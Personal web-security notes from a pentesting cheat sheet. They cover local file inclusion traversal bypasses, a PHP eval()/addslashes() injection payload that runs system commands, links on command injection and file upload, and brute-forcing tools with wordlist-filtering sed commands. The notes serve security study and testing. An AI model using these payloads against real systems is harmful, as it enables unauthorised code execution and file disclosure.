Web
Table of Contents
Disclaimer: These are my personal notes, published "as-is"
without warranty or guarantee of any kind. Use at your own risk. Licensed
CC BY-NC-SA 4.0.
Local file inclusion #
../
specific find/replace can be bypassed with..//
- e.g.
/uploads/%2e%2e/%2fsys/class/net/eth0/address
→/uploads/..//sys/class/net/eth0/address
- Resolve a network path =
http://host.tld/?page=//11.22.33.44/@OsandaMalith
PHP - Bypass eval()
with addslashes()
#
Where a value from a URL is passed through eval()
with addslashes()
POC: ?str=${eval($_GET[1])}&1=phpinfo();
For example: GET /?format=${eval($_GET[1])}&1=system('ls');
https://www.programmersought.com/article/30723400042/
Command injection #
Characters #
See https://academy.hackthebox.com/module/109/section/1032
Resources #
File upload #
See https://academy.hackthebox.com/module/136/section/1291
Brute forcing #
- Hydra - logins and forms.
- CUPP - customized wordlists.
- Username Anarchy - username generator.
- See also other tools.
If we know the password rules:
sed -ri '/^.{,7}$/d' words.txt # remove shorter than 8
sed -ri '/[!-/:-@\[-`\{-~]+/!d' words.txt # remove no special chars
sed -ri '/[0-9]+/!d' words.txt # remove no numbers